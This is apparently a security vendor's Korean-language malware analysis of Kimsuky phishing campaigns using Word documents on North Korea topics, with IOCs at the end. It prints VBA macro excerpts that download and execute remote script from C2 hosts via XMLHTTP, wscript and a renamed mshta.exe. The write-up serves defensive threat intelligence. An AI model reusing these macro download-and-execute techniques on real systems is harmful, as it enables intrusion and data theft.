공격자 메일에 회신한 경우에 외부 링크로 제공되는 워드문서 (Kimsuky)

ASEC 분석팀은 대북 관련 내용의 악성 워드 문서가 꾸준히 유포되고 있음을 확인하였다. 확인된 워드 문서는 안랩 TIP에 공개된 “2021년 Kimsuky 공격 워드(word) 문서 사례 총 정리 분석 보고서” 및 ‘외교/안보 관련 내용의 워드문서 유포 중‘ 에서 공유한 워드 문서 유형과 더불어 mshta를 이용하는 유형이 확인되었다.

악성 워드 문서는 다음과 같이 다양한 파일명으로 유포되고 있다.

  • 김** 이력서(한미**협회,220711).doc
  • 양**_**재단 중간보고(220716).doc
  • 자문 요청서.doc

  • 유형 1

자문 요청서.doc 파일명의 악성 워드 문서는 아래의 메일을 통해 유포되었을 것으로 추정된다. 공격자는 국내 기관을 사칭하여 보고서 작성에 대해 자문을 요청하기 위한 내용의 메일을 전송하였다.

1차 공격 이메일 (첨부파일 없음)

메일에 직접 워드 문서를 첨부하지 않고 사용자가 해당 메일에 긍정적으로 답변하였을 경우에만 다음과 같이 워드 문서를 다운로드 할 수 있는 악성 URL을 삽입하여 회신하는 것으로 확인되었다.

사용자가 요청을 거절한 경우 공격자의 회신(링크 포함 X)
사용자가 요청을 수락한 경우 2차 공격 이메일 수신 (워드문서 링크삽입)

위 메일에 존재하는 링크 클릭 시 다음과 같이 추가 악성 URL이 포함된 페이지가 확인된다.

추가 악성 URL 접속을 유도하는 페이지

우측 하단의 다운로드 클릭 시 hxxps://accounts.serviceprotect[.]eu/signin/v2/identifier?hl=kr&passive=true&<생략>rtnurl=aHR0cHM6Ly9kb2NzLmdv<생략> 에 접속한다. 현재 해당 URL에 접속이 불가하지만 URL 주소로 보아 사용자의 로그인 정보 수집하였을 것으로 추정되며 rtnurl 파라미터 값의 주소에서 악성 워드 문서를 다운로드 하였을 것으로 보인다.

확인된 워드 문서 실행 시 다음과 같이 매크로 실행을 유도하는 문구가 한글로 작성된 이미지가 포함되어 있다. 이후 사용자가 콘텐츠 사용 버튼 클릭 시 자문 요청과 관련된 내용이 나타나 사용자가 악성 파일임을 알아채기 어렵다.

매크로 실행 유도 이미지
매크로 사용 시 나타나는 본문 내용

워드 문서에는 VBA 매크로가 포함되어 있으며 특정 URL에 접속하는 행위를 수행한다. 아래는 매크로 코드의 일부이다.

Sub Reserve(pth)
    Documents.Add
    cnt = "On Error Resume Next:Set mx = CreateObje" & "ct(""Microsoft.XMLHTTP""):mx.open ""GET"", ""hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1"", False:mx.Send:Execute(mx.responseText)"

Sub AutoOpen()
    On Error Resume Next
    pw = "1qaz2wsx"
    Weed pw

    obt = "winmgmts:win32_process" 
Set wm = GetObject(obt)
        pth = Templates(1).Path & "\version.ini"
        cd = "wscript.exe //e:vbscript //b"
wm.Create cd & pth

End Sub

매크로가 실행되면 AppData\Roaming\Microsoft\Templates 폴더에 version.ini 파일을 생성한다. 이후 wscript.exe를 통해 생성한 ini 파일을 실행한다.

  • wscript.exe //e:vbscript //b %AppData%\Microsoft\Templates\version.ini
On Error Resume Next:Set mx = CreateObject("Microsoft.XMLHTTP"):mx.open "GET", "hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1", False:mx.Send:Execute(mx.responseText)

version.ini

현재 URL에 접속이 불가하여 이후 행위는 확인이 불가하지만 이전에 확인된 ‘탄소배출 전문기업 타겟 워드문서 공격‘ 과 유사하게 사용자 PC 정보 유출 등의 행위가 수행되었을 것으로 추정된다.

  • 유형 2

해당 유형은 특정 웨비나의 일정과 관련된 내용을 포함하여 유포되고 있으며 mshta를 통해 C2에 접속하는 행위를 수행한다. 유형1과 동일하게 워드 문서 실행 시 매크로 실행을 유도하는 이미지가 포함되어 있으며 사용자가 콘텐츠 허용 버튼을 클릭하면 다음과 같이 대북 관련 주제의 웨비나의 내용이 나타단다.

매크로 사용 시 나타나는 본문 내용

확인된 워드 문서 역시 VBA 매크로를 포함하고 있으며 다음은 문서에 포함된 매크로 코드 중 일부이다.

Sub AutoOpen()

jsfds = "cmd /c copy %windir%\system32\mshta.exe %tmp%\gtfmon.exe"
Shell jsfds, 0

jsfds = "cmd /c timeout /t 7 >NUL && %tmp%\gtfmon.exe hxxp://freunkown1.sportsontheweb[.]net/h.php"
Shell jsfds, 0

End Sub

매크로 실행 시 mshta.exe를 TEMP 폴더에 gtfmon.exe 명으로 복사한 후 cmd 명령어를 통해 특정 URL에 접속을 시도한다.

  • cmd /c timeout /t 7 >NUL && %tmp%\gtfmon.exe hxxp://freunkown1.sportsontheweb[.]net/h.php

유형1과 마찬가지로 현재 위 URL에 접속이 불가하여 이후 행위는 확인이 불가하지만, 사용자 PC 정보 유출 등의 악성 행위가 이루어졌을 것으로 추정된다.

대북 관련 내용을 포함한 악성 워드 문서가 꾸준히 확인되고 있어 사용자의 주의가 필요하다. 특히 정상적인 사용자를 사칭하여 악성 문서를 유포하는 정황이 확인되고 있어 메일 발신자의 주소를 확인하고 첨부파일 열람 및 본문에 포함된 링크 클릭에 주의해야 한다.

[파일 진단]
Downloader/DOC.Kimsuky

[IOC]
357ef37979b02b08120895ae5175eb0a (doc)
7fe055d5aa72bd50470da61985e12a8a (doc)
hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1
hxxp://freunkown1.sportsontheweb[.]net/h.php

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:, ,

5 1 vote
별점 주기
guest

0 댓글
Inline Feedbacks
View all comments